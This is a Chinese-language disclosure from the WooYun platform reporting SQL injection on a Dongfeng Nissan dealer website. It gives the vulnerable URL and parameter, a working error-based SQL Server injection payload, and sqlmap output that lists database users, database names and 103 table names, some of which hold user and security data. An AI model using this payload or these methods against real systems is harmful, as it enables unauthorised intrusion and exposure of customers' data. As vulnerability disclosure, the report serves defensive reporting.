当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045933

漏洞标题:东风日产#官网存在SQL注入(设计大量用户信息)

相关厂商:dfyb.com

漏洞作者: he2des

提交时间:2013-12-19 17:14

修复时间:2013-12-24 17:15

公开时间:2013-12-24 17:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

不知道提交到那里哦,所以交给cncert国家互联网应急中心了哦。

详细说明:

#1:注入点

QQ图片20131214151820.jpg


http://www.dongfeng-nissan.com.cn/dealer/nissan/zhejiang/wenzhou/wzjhong/news?newstype=NewsType_004

---
Place: GET
Parameter: newstype
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: newstype=NewsType_004' AND 2738=CONVERT(INT,(CHAR(58)+CHAR(119)+CHA
R(101)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (2738=2738) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(58)+CHAR(106)+CHAR(108)+CHAR(106)+CHAR(58))) AND 'BhUX'='BhUX
---
[15:17:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:17:08] [INFO] fetching database users
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': 4
[15:17:08] [INFO] the SQL query used returns 4 entries
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': ##MS_PolicyEventProcessingLogin##
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': ##MS_PolicyTsqlExecutionLogin##
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': read
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': sa
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] read
[*] sa
[15:17:08] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.dongfeng-nissan.com.cn'

漏洞证明:

available databases [12]:
[*] DFLBackground
[*] DFLLoginLog
[*] DFLSitecore_Core
[*] DFLSitecore_Extend
[*] DFLSitecore_Web
[*] DFLWebService
[*] master
[*] model
[*] msdb
[*] Npass
[*] SMS
[*] tempdb

QQ图片20131214151924.jpg


[103 tables]
+------------------------------+
| dbo.ACTIVITY                 |
| dbo.ACTIVITY_SERIES          |
| dbo.ACTIVITY_UPDATE_LOG      |
| dbo.COMMON_PARAMETER         |
| dbo.COMMON_PARAMETER_DETAIL  |
| dbo.DEALER_BIND_MOBILE       |
| dbo.DEALER_INFO              |
| dbo.DEALER_KV                |
| dbo.DEALER_MEDIA_MAPPING     |
| dbo.DEALER_POINTS            |
| dbo.DEALER_PRICE             |
| dbo.DEALER_PRICE1212         |
| dbo.DEALER_PRICE20131202     |
| dbo.DEALER_SERIES_MAPPING    |
| dbo.DEALER_VIDEO             |
| dbo.FILE_UPLOAD              |
| dbo.HELP_CENTER              |
| dbo.MEDAL                    |
| dbo.MEDAL_DEALERS            |
| dbo.MEDIA_DEALER_MAPPING     |
| dbo.MEDIA_TAB_INFORMATION    |
| dbo.MESSAGE_DEALER           |
| dbo.MESSAGE_INFO             |
| dbo.MESSAGE_USER             |
| dbo.MODULE                   |
| dbo.NEWS                     |
| dbo.NEWS_MODEL_CONFIG        |
| dbo.NEWS_SERIES              |
| dbo.NEWS_UPDATE_LOG          |
| dbo.OFFICAL_ISSUE_ACTIVITY   |
| dbo.OFFICAL_ISSUE_ATTACH     |
| dbo.OFFICAL_ISSUE_DEALER     |
| dbo.OFFICAL_ISSUE_IMAGE      |
| dbo.OFFICAL_ISSUE_KV         |
| dbo.OFFICAL_ISSUE_NEWS       |
| dbo.OFFICAL_ISSUE_PACKAGE    |
| dbo.OFFICAL_ISSUE_VIDEO      |
| dbo.ONLINEQA                 |
| dbo.ONLINEQA_TEMPLETE        |
| dbo.ONLINE_ANSWER            |
| dbo.OPERATER_LOG             |
| dbo.REGION                   |
| dbo.REGION_DEALERS           |
| dbo.REGION_DEALERS20131206   |
| dbo.REGION_DEALERS_TP        |
| dbo.REGION_INFO              |
| dbo.REGION_KV                |
| dbo.REGION_PRICE             |
| dbo.SECURITY_ACTION          |
| dbo.SECURITY_MOUDLE          |
| dbo.SECURITY_ROLE            |
| dbo.SECURITY_USER            |
| dbo.SECURITY_USER20131206    |
| dbo.SECURITY_USER_UPDATE_LOG |
| dbo.SITECORE_DEALER_PATH     |
| dbo.USER_SHORT_CUT           |
| dbo.VIDEO_DETAIL             |
| dbo.WEBSITE_VISIT_ANALYSIS   |
| dbo.WEB_FORM_CUS_INFO        |
| dbo.WEB_FORM_INFO            |
| dbo.ZAN                      |
| dbo.ZAN_DETAILS              |
| dbo.ZAN_ITEM_MAPPING         |
| dbo.dealername$              |
| dbo.newcount$                |
| dbo.newrd$                   |
| dbo.newregion$               |
| dbo.news20131202             |
| dbo.news_20131203            |
| dbo.region1                  |
| dbo.sysdiagrams              |
| dbo.tmpNoRegion              |
| dbo.tmpOneRoneD              |
| dbo.tmp_region_venucia       |
| dbo.view_AllDealerDflMails   |
| dbo.view_AllDealerURLs       |
| dbo.view_AllDealerURLsEx     |
| dbo.view_AllDealers          |
| dbo.view_AllModel            |
| dbo.view_AllModelInfo        |
| dbo.view_AllModelParameters  |
| dbo.view_AllModelPrice       |
| dbo.view_AllRegionNames      |
| dbo.view_DealerCity          |
| dbo.view_DealerCityCode      |
| dbo.view_DealerCodes         |
| dbo.view_DealerProvinceCode  |
| dbo.view_DealerRegionName    |
| dbo.view_ModelCodes          |
| dbo.view_ModelConfig         |
| dbo.view_NissanDealers       |
| dbo.view_NotDealers          |
| dbo.view_ProvinceCity        |
| dbo.view_SeriesCodes         |
| dbo.view_ShowAllSeries       |
| dbo.view_ShowSerieCodes      |
| dbo.view_VenuciaDealers      |
| dbo.勋章类$                        |
| dbo.启辰$                        |
| dbo.城市站点$                        |
| dbo.日产$                        |
| dbo.通过绿色专营店认证名单$                        |
| dbo.需要使用的专营店$                        |
+------------------------------+


数据量相对比较大哦,但是还是希望贵站重视安全问题哦。

修复方案:

过滤~

版权声明:转载请注明来源 he2des@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-24 17:15

厂商回复:

最新状态:

暂无